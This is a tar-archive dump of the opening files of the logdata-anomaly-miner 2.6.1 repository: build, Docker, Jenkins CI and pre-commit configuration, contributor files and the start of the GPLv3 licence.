pax_global_header00006660000000000000000000000064143760656010014522gustar00rootroot0000000000000052 comment=7a6677acf3bee55195629ef07faa67cefe563c6e logdata-anomaly-miner-2.6.1/000077500000000000000000000000001437606560100157115ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/.deepsource.toml000066400000000000000000000005261437606560100210250ustar00rootroot00000000000000version = 1 exclude_patterns = [ "aecid-testsuite/**", "source/root/etc/aminer/template_config.py", "source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/**" ] [[analyzers]] name = "python" enabled = true [analyzers.meta] runtime_version = "3.x.x" max_line_length = 140 [[analyzers]] name = "test-coverage" enabled = true logdata-anomaly-miner-2.6.1/.github/000077500000000000000000000000001437606560100172515ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/.github/pull_request_template.md000066400000000000000000000012661437606560100242170ustar00rootroot00000000000000# Make sure these boxes are signed before submitting your Pull Request -- thank you. 
# Must haves - [ ] I have read and followed the contributing guide lines at https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow - [ ] Issues exist for this PR - [ ] I added related issues using the "Fixes #"-notations - [ ] This Pull-Requests merges into the "development"-branch Fixes # # Submission specific - [ ] This PR introduces breaking changes - [ ] My change requires a change to the documentation - [ ] I have updated the documentation accordingly - [ ] I have added tests to cover my changes - [ ] All new and existing tests passed # Describe changes: - logdata-anomaly-miner-2.6.1/.gitignore000066400000000000000000000043741437606560100177110ustar00rootroot00000000000000# Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # vim *.swp # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ parts/ sdist/ var/ wheels/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. 
*.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ cover/ # Translations *.mo *.pot # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation _build docs/_build/ docs/Wiki docs/SECURITY.md docs/README.md docs/LICENSE.md #docker akafka/ aminercfg/ persistency/ logs/ # PyBuilder .pybuilder/ target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv # For a library or package, you might want to ignore these files since the code is # intended to run in multiple environments; otherwise, check them in: # .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # PyCharm IDE .idea/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ # pytype static type analyzer .pytype/ # Cython debug symbols cython_debug/ # ignore ansible-roles roles/ playbook.yml playbook.retry # for testing aecid-testsuite/aminer aecid-testsuite/demo/aminer/template_config.py # Aminer Docker Volumes aminercfg/ persistency/ logs/ logdata-anomaly-miner-2.6.1/.playbook.yml000066400000000000000000000003161437606560100203320ustar00rootroot00000000000000# aminer-ansible: https://github.com/ait-aecid/aminer-ansible.git - hosts: localhost vars: aminer_gitrepo: False # MODIFY THIS PATH aminer_repopath: "{{SOURCEDIR}}" roles: - aminer logdata-anomaly-miner-2.6.1/.pre-commit-config.yaml000066400000000000000000000013311437606560100221700ustar00rootroot00000000000000# See https://pre-commit.com for more information # See https://pre-commit.com/hooks.html for more hooks repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v3.2.0 hooks: - id: trailing-whitespace - id: end-of-file-fixer - id: check-yaml - id: check-added-large-files - repo: https://github.com/pre-commit/mirrors-mypy rev: v0.790 hooks: - id: mypy additional_dependencies: [pydantic] - repo: https://gitlab.com/pycqa/flake8 rev: 3.8.4 hooks: - id: flake8 args: [--max-line-length=140] - repo: https://github.com/pre-commit/mirrors-autopep8 rev: v1.7.0 hooks: - id: autopep8 args: [--max-line-length=140, --diff] logdata-anomaly-miner-2.6.1/AUTHORS000066400000000000000000000004451437606560100167640ustar00rootroot00000000000000Roman Fiedler Markus Wurzenberger Max Landauer Wolfgang Hotwagner Ernst Leierzopf Georg Hoeld Florian Skopik Daniel Klimas 
logdata-anomaly-miner-2.6.1/Build000077500000000000000000000042421437606560100167000ustar00rootroot00000000000000#!/bin/bash -e # Build script wrapper # # How to use: # # * Build package only in temporary location _tmpRoot, # use it also for storing of temporary files (which should be # removed before creating the package). The directory is deleted # at the end of the script. By using it that way, no garbage files # are left over after building and symlink attacks on temporary # directories are prevented. # # The script will place the new packages in the current working # directory, overwriting any existing files of same name. if [ "${EUID} ${UID}" = "0 0" ] && touch /fake-root-detect 2> /dev/null; then rm /fake-root-detect echo "Build should not be run as root!" >&2 exit 1 fi # Export tmp dir to allow large package builds within vservers export TMPDIR="/var/tmp" _projectDir="$(pwd)" # Use a temporary directory for building, no need to keep it. _tmpRoot="$(mktemp -d)" echo "Building package at ${_tmpRoot}" >&2 _debDirectory="${_tmpRoot}/deb-build" _tarVersion=$(head -1 debian/changelog | awk 'match($0, /\(.*\)/) { print substr($0, RSTART+1, RLENGTH-4) } ') mkdir -- "${_debDirectory}" cp -a -- "${_projectDir}/debian" "${_projectDir}/source/root" "${_debDirectory}" cp -a -- "${_projectDir}/README.md" "${_debDirectory}" fakeroot -- tar -C ${_debDirectory} -czf "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" --transform 's,^./,deb-build/,' . gpg -ab "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" # Build packages: # -F: full build # -us: unsigned sorce # -uc: unsigned changes # -sa: force inclusion of original source (set -e; cd -- "${_debDirectory}"; dpkg-buildpackage -S -us -uc -sa; dpkg-buildpackage -b -uc) rm -rf -- "${_debDirectory}" cp -a -- "${_tmpRoot}/logdata-anomaly-miner_"* . rm -rf -- "${_tmpRoot}" # Build the alienated package for CentOS/Redhat. 
_debFileName="$(ls -- logdata-anomaly-miner_*_all.deb)" _debVersion="$(echo "${_debFileName}" | sed -r -e 's/logdata-anomaly-miner_([0-9a-z.~-]+)_all.deb/\1/')" fakeroot -- /usr/bin/alien --to-rpm "${_debFileName}" mv -i -- "logdata-anomaly-miner-${_debVersion}-2.noarch.rpm" "logdata-anomaly-miner-${_debVersion}-2.noarch.alien.rpm" < /dev/null echo "Build successful" >&2 logdata-anomaly-miner-2.6.1/Dockerfile000066400000000000000000000104131437606560100177020ustar00rootroot00000000000000# logdata-anomaly-miner Dockerfile # # Use build-script to create docker: # scripts/build_docker.sh # # Build manually: # docker build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker # # Pull base image. FROM debian:bullseye ARG UNAME=aminer ARG UID=1000 ARG GID=1000 # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y \ supervisor \ python3 \ python3-pip \ python3-tz \ python3-scipy \ python3-pkg-resources \ python3-setuptools \ python3-dateutil \ python3-six \ python3-scipy \ python3-kafka \ python3-cerberus \ python3-yaml \ python3-pylibacl \ python3-urllib3 \ python3-statsmodels \ libacl1-dev # Docs RUN apt-get update && apt-get install -y \ python3-sphinx \ python3-sphinx-rtd-theme \ python3-recommonmark \ make # For Docs ADD docs /docs ADD README.md /docs ADD SECURITY.md /docs ADD LICENSE /docs/LICENSE.md # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. 
ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN ln -s /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol \ && ln -s /usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminer.py \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && chmod 0755 /etc/aminer \ && ln -s /usr/lib/python3/dist-packages/kafka /usr/lib/logdata-anomaly-miner/kafka \ && ln -s /usr/lib/python3/dist-packages/cerberus /usr/lib/logdata-anomaly-miner/cerberus \ && ln -s /usr/lib/python3/dist-packages/scipy /usr/lib/logdata-anomaly-miner/scipy \ && ln -s /usr/lib/python3/dist-packages/numpy /usr/lib/logdata-anomaly-miner/numpy \ && ln -s /usr/lib/python3/dist-packages/pkg_resources /usr/lib/logdata-anomaly-miner/pkg_resources \ && ln -s /usr/lib/python3/dist-packages/yaml /usr/lib/logdata-anomaly-miner/yaml \ && ln -s /usr/lib/python3/dist-packages/pytz /usr/lib/logdata-anomaly-miner/pytz \ && ln -s /usr/lib/python3/dist-packages/dateutil /usr/lib/logdata-anomaly-miner/dateutil \ && ln -s /usr/lib/python3/dist-packages/six.py /usr/lib/logdata-anomaly-miner/six.py \ && ln -s /usr/lib/python3/dist-packages/urllib3 /usr/lib/logdata-anomaly-miner/urllib3 \ && ln -s /usr/lib/python3/dist-packages/statsmodels /usr/lib/logdata-anomaly-miner/statsmodels \ && groupadd -g $GID -o $UNAME && useradd -u $UID -g $GID -ms /usr/sbin/nologin $UNAME && mkdir -p /var/lib/aminer/logs \ && chown $UID.$GID -R /var/lib/aminer \ && chown $UID.$GID -R /docs \ && chmod 0755 /aminerwrapper.sh RUN PACK=$(find 
/usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE RUN pip3 install orjson RUN PACK=$(find /usr/local/lib/ -name orjson.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Prepare Supervisord COPY scripts/supervisord.conf /etc/supervisor/conf.d/supervisord.conf RUN mkdir /var/lib/supervisor && chown $UID.$GID -R /var/lib/supervisor \ && chown $UID.$GID -R /var/log/supervisor/ USER aminer WORKDIR /home/aminer # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/aminerwrapper.sh"] # Default command for the ENTRYPOINT(wrapper) CMD ["aminer","--config","/etc/aminer/config.yml"] logdata-anomaly-miner-2.6.1/Jenkinsfile000066400000000000000000000513511437606560100201020ustar00rootroot00000000000000void setBuildStatus(String message, String state) { step([ $class: "GitHubCommitStatusSetter", reposSource: [$class: "ManuallyEnteredRepositorySource", url: "https://github.com/ait-aecid/logdata-anomaly-miner"], contextSource: [$class: "ManuallyEnteredCommitContextSource", context: "ci/jenkins/build-status"], errorHandlers: [[$class: "ChangingBuildStatusErrorHandler", result: "UNSTABLE"]], statusResultSource: [ $class: "ConditionalStatusResultSource", results: [[$class: "AnyBuildResult", message: message, state: state]] ] ]); } def ubuntu18image = false def ubuntu20image = false def debianbusterimage = false def debianbullseyeimage = false def productionimage = false def docsimage = false pipeline { agent any stages { stage("Build Test-Container") { steps { sh "docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." 
} } stage("Static Analysis & Basic Functionality") { parallel { stage("Mypy"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMypy" } } stage("Release String Check"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runReleaseStringCheck" } } stage("Suspend Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runSuspendModeTest" } } stage("Remote Control"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runRemoteControlTest" } } stage("Integration Test 1"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest.sh config.py" } } stage("Integration Test 2"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest2.sh config21.py config22.py" } } stage("Offline Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runOfflineMode" } } } } stage("Unittests") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runUnittests" } } stage("Aminer Demo Tests") { parallel { stage("demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.py" } } stage("demo-config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.yml" } } stage("jsonConverterHandler-demo-config.py") { steps { sh "docker run -m=2G --rm 
aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/jsonConverterHandler-demo-config.py" } } stage("template_config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.py" } } stage("template_config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.yml" } } stage("Encoding Demo .py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.py" } } stage("Encoding Demo .yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.yml" } } } } stage("Json Input Tests") { parallel { stage("Json Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerJsonInputDemo" } } stage("Aminer") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-aminer-demo.yml" } } stage("Elastic") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-elastic-demo.yml" } } stage("Eve") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-eve-demo.yml" } } stage("Journal") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-journal-demo.yml" } } stage("Wazuh") { steps { sh "docker run -m=2G --rm 
aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-wazuh-demo.yml" } } stage("Windows") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/windows.yml" } } } } stage("System, Documentation and Wiki Tests") { parallel { stage("Available Configs") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runConfAvailableTest" } } stage("Debian Bullseye") { steps { script { debianbullseyeimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bullseye ." sh "mkdir -p /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! 
timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Debian Buster") { steps { script { debianbusterimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:buster ." sh "mkdir -p /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! 
timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Production Docker Image") { steps { script { productionimage = true } sh "docker build -f Dockerfile -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." sh "mkdir -p /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! 
timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Ubuntu 18.04") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script{ ubuntu18image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:18.04 ." sh "docker run --rm aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } stage("Test Ubuntu 20.04") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu20image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:20.04 ." sh "docker run --rm aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } stage("Build Documentation") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } environment { BUILDDOCSDIR = sh(script: 'mktemp -p $WORKSPACE_TMP -d | tr -d [:space:]', returnStdout: true) } steps { script { docsimage = true } sh "docker build -f Dockerfile -t aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." 
sh "chmod 777 ${env.BUILDDOCSDIR}" sh "chmod g+s ${env.BUILDDOCSDIR}" sh "docker run --rm -v ${env.BUILDDOCSDIR}:/docs/_build aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID mkdocs" sh "scripts/deploydocs.sh ${env.BRANCH_NAME} ${env.BUILDDOCSDIR}/html /var/www/aeciddocs/logdata-anomaly-miner" } } stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut development" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted development" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector development" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector development" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector development" } } stage("EntropyDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToEntropyDetector development" } } } } stage("Wiki Tests - main") { when { branch "main" } parallel { stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut main" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted main" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector main" 
} } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector main" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector main" } } } } } post { always { script { sh "docker rmi aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" if( debianbullseyeimage == true ) { sh "docker rmi aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbusterimage == true ) { sh "docker rmi aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( productionimage == true ) { sh "docker rmi aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu18image == true ) { sh "docker rmi aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu20image == true ) { sh "docker rmi aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( docsimage == true){ sh "docker rmi aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } } success { setBuildStatus("Build succeeded", "SUCCESS"); } failure { setBuildStatus("Build failed", "FAILURE"); } } } logdata-anomaly-miner-2.6.1/LICENSE000066400000000000000000001045131437606560100167220ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software 
Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to 